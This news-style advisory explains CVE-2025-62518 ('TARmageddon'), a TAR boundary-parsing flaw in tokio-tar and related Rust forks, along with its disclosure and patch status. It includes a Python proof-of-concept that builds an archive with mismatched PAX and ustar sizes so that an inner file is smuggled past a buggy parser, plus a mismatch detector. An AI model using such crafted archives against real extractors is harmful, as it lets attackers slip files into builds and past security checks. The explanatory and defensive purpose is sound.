The Edera security team has discovered a critical vulnerability in the async-tar Rust library and its descendants, including the widely-used tokio-tar.
Dubbed TARmageddon and assigned CVE-2025-62518, this flaw carries a CVSS score of 8.1 (High) and enables attackers to execute remote code by overwriting configuration files and hijacking critical build systems.
| Field | Details |
| --- | --- |
| CVE ID | CVE-2025-62518 |
| Vulnerability Name | TARmageddon |
| Affected Libraries | async-tar, tokio-tar, astral-tokio-tar |
| CVSS 3.1 Score | 8.1 |
| Severity | High |
Understanding the Attack Vector
The vulnerability stems from a boundary-parsing bug that allows attackers to insert hidden files into TAR archive extractions through a technique called file smuggling.
When the parser encounters nested TAR files with mismatched PAX (Portable Archive eXchange) and ustar headers, it fails to properly calculate file boundaries.
Specifically, if the PAX header declares a file size of 1 MB while the ustar header claims 0 bytes, the parser incorrectly skips only 0 bytes instead of jumping past the entire file content.
This desynchronization causes the parser to misinterpret data from hidden inner archives as legitimate entries belonging to the outer archive, effectively allowing attackers to slip malicious files past security controls and into extraction directories.
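As an added illustration, not code from Edera or from any of the affected crates, the following Python builds a constructed archive with exactly this PAX/ustar size disagreement and walks it two ways: honoring the PAX size override, as a correct parser must, and ignoring it, which reproduces the bug class described above. The entry names, sizes and contents are constructed, and pax_size_mismatches is an assumed defensive check, not an API of any tokio-tar fork.

```python
BLOCK = 512

def pad(data: bytes) -> bytes:
    return data + b"\0" * (-len(data) % BLOCK)
def ustar_header(name: str, size: int, typeflag: bytes = b"0") -> bytes:
    h = bytearray(BLOCK)
    h[:len(name)] = name.encode()
    h[100:136] = b"0000644\0" + b"0000000\0" * 2 + f"{size:011o}\0".encode()  # mode uid gid size
    h[136:156], h[156:157], h[257:265] = b"00000000000\0" + b" " * 8, typeflag, b"ustar\x0000"
    h[148:156] = f"{sum(h):06o}\0 ".encode()        # checksum over the space-filled header
    return bytes(h)
def pax_record(key: str, value) -> bytes:
    body = f" {key}={value}\n"                      # "<len> key=value\n", len counts itself
    n = len(body) + len(str(len(body)))
    n += len(str(n)) - len(str(len(body)))          # length digits may grow by one
    return f"{n}{body}".encode()

def build_sample_archive(payload: bytes = b"constructed hidden contents\n") -> bytes:
    """Constructed: PAX says len(inner) bytes, ustar says 0, and the body is itself a TAR."""
    inner = ustar_header("smuggled.cfg", len(payload)) + pad(payload)
    pax = pax_record("size", len(inner))
    return (ustar_header("PaxHeaders/readme.txt", len(pax), b"x") + pad(pax)
            + ustar_header("readme.txt", 0) + inner
            + ustar_header("outer/ok.txt", 2) + pad(b"ok") + b"\0" * (2 * BLOCK))

def walk(archive: bytes, honor_pax_size: bool = True):
    """Yield (name, ustar_size, pax_size); honor_pax_size=False reproduces the bug class."""
    off, pax_size = 0, None
    while off + BLOCK <= len(archive):
        hdr = archive[off:off + BLOCK]
        if hdr == b"\0" * BLOCK:                    # end-of-archive marker
            break
        name = hdr[:100].split(b"\0", 1)[0].decode()
        size = int(hdr[124:136].split(b"\0", 1)[0] or b"0", 8)
        off += BLOCK
        if hdr[156:157] == b"x":                    # PAX extended header for the next entry
            for rec in archive[off:off + size].decode().splitlines():
                key, _, value = rec.split(" ", 1)[1].partition("=")
                pax_size = int(value) if key == "size" else pax_size
        else:
            yield name, size, pax_size
            size = pax_size if honor_pax_size and pax_size is not None else size
            pax_size = None
        off += -(-size // BLOCK) * BLOCK            # entry data is 512-byte aligned

def entry_names(archive: bytes, honor_pax_size: bool = True) -> list:
    return [name for name, _, _ in walk(archive, honor_pax_size)]

def pax_size_mismatches(archive: bytes) -> list:   # defensive check, assumed helper
    return [n for n, ustar, pax in walk(archive) if pax is not None and pax != ustar]
```

With the override honored the walker lists only readme.txt and outer/ok.txt; with it ignored, smuggled.cfg from the inner archive surfaces as an outer entry, which is the desynchronization the advisory describes.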

This flaw impacts major projects including uv (Astral’s Python package manager), testcontainers, wasmCloud, and numerous other dependencies.
The exact scope of affected systems remains unknown due to tokio-tar’s widespread distribution across the ecosystem.
The Abandonware Problem
What makes TARmageddon particularly concerning is that the most popular fork, tokio-tar with over 5 million downloads on crates.io, appears to be abandoned and no longer actively maintained.
Unlike typical vulnerability disclosures where a single upstream patch cascades to all downstream users, the Edera team faced a fragmented fork landscape with no clear maintenance structure.
The team was forced to conduct a decentralized disclosure process, coordinating patches across async-tar (the root), tokio-tar (the popular but unmaintained fork), krata-tokio-tar (archived), and astral-tokio-tar (actively maintained by Astral).
Without security contact information, researchers had to locate maintainers through social engineering and community research, then coordinate simultaneous patching under a strict 60-day embargo period.
Attackers could exploit TARmageddon in several dangerous ways. A Python build backend hijacking attack could involve uploading a malicious package to PyPI with a hidden inner TAR containing compromised build configuration, leading to RCE during package installation on developer machines and CI systems.
Similarly, container testing frameworks could be tricked into processing poisoned image layers, introducing unexpected files into test environments.
The vulnerability also enables security control bypasses where separate scanning and extraction phases allow attackers to slip unapproved files past approval systems.
Active forks including astral-tokio-tar have been successfully patched, and the Edera team has published patches for affected versions.
However, tokio-tar remains unpatched due to abandonment. Users should immediately upgrade to patched versions or migrate to actively maintained alternatives like astral-tokio-tar.
The Edera fork krata-tokio-tar will be archived to consolidate efforts and reduce ecosystem confusion.